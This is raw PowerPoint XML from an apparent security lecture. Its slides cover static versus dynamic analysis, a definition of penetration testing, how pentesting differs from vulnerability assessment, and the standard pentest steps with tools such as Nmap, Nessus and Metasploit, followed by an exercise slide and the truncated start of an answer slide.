          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Static analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Automated methods to find errors or check their absence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider all possible inputs (in summary form)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find bugs and vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can prove absence of bugs, in some cases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Dynamic analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Run instrumented code to find problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need to choose sample test input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can find vulnerabilities but cannot prove their absence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6AACD97-5531-5D6D-01D1-30567708A0CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7F02E961-DE47-4AD4-ABF1-9D5530B885CA}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C48FBCD-AEFA-FEC3-BFC8-2F162C53645A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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257793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Penetration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> testing (PENTEST)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" b="1" dirty="0"/>
              <a:t>penetration test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" dirty="0"/>
              <a:t> is a method of evaluating the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" dirty="0">
                <a:hlinkClick r:id="rId2" tooltip="Computer &#10;security"/>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" dirty="0"/>
              <a:t> of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" dirty="0">
                <a:hlinkClick r:id="rId3" tooltip="Computer &#10;system"/>
              </a:rPr>
              <a:t>computer system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" dirty="0">
                <a:hlinkClick r:id="rId4" tooltip="Computer &#10;network"/>
              </a:rPr>
              <a:t>network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" dirty="0"/>
              <a:t> by simulating an attack from a malicious source, known as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" i="1" dirty="0">
                <a:hlinkClick r:id="rId5" tooltip="Hacker (computing)"/>
              </a:rPr>
              <a:t>Black Hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" i="1" dirty="0">
                <a:hlinkClick r:id="rId6" tooltip="Hacker (computer security)"/>
              </a:rPr>
              <a:t>Hacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" dirty="0"/>
              <a:t>, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" i="1" dirty="0"/>
              <a:t>Cracker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" dirty="0"/>
              <a:t>. – Wikipedia</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E9A72F45-37B3-4D9F-B0CE-0781214EA628}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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033144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PENTEST vs. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>assessment</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" i="1" dirty="0"/>
              <a:t>Vulnerability Assessment:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0"/>
              <a:t>Predictable. Can be planned &amp; designed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0"/>
              <a:t>Unreliable at times and high rate of false positives. (I’ve got a banner) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0"/>
              <a:t>Produces a report with mitigation guidelines and action items. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" i="1" dirty="0"/>
              <a:t>Penetration Testing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0"/>
              <a:t>Unpredictable by the recipient. (Don’t know the “how?” and “when?”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0"/>
              <a:t>Highly accurate and reliable. (I’ve got root!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0"/>
              <a:t>Penetration Testing = Proof of Concept against vulnerabilities. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0"/>
              <a:t>Produces a binary result:  Either the team owned you, or they didn't. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{281D53C3-B614-45A2-BA29-8BE8F9DB2EAA}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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4042500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PENTEST - STEPS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Analysis and Information Gathering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network Enumeration and Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability Testing and Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reporting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{9363BEFF-9D00-459C-ADAF-1FB526AF070B}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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588081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PENTEST - STEPS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Analysis and Information Gathering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To discover as much information about a target (individual or organization) as possible without actually making network contact with said target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Methods:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Organization info discovery via WHOIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Google search</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Website browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{378AD3FD-C7CB-40F3-8688-AD3517802F7A}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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116010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PENTEST - STEPS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Analysis and Information Gathering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network Enumeration and Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To discover existing networks owned by a target as well as live hosts and services running on those hosts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Scanning programs that identify live hosts, open ports, services, and other info (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>autoscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> DNS Querying</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Route analysis (traceroute) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{2DD9BEA1-1DF1-4FA7-95B0-B30CC45C72AF}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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905961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PENTEST - STEPS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1024128" y="1528012"/>
            <a:ext cx="10786872" cy="5329988"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Analysis and Information Gathering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network Enumeration and Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability Testing and Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To check hosts for known vulnerabilities and to see if they are exploitable, as well as to assess the potential severity of said vulnerabilities.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Methods:  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>scanning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>OpenVAS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Active </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>exploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>Login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>checking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>bruteforcing</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>exploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>Core</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>0day and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>discovery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>Fuzzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>, program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Post </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>exploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>techniques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>assess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>severity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>permission</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>levels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>backdoors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>rootkits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{D92E40F6-5E38-42CC-80D9-03302133D3ED}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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749451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Exercise</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0E87035B-EF9D-439D-BB41-7E8EF2C596CE}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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385865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en-US" altLang="nb-NO"/>
              <a:t>Answer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="388099" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="1371600"/>
            <a:ext cx="7772400" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0"/>
              <a:t>"GET</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0"/>
              <a:t>/programs/biosafety/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0" err="1"/>
              <a:t>bioSafety_handBook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0"/>
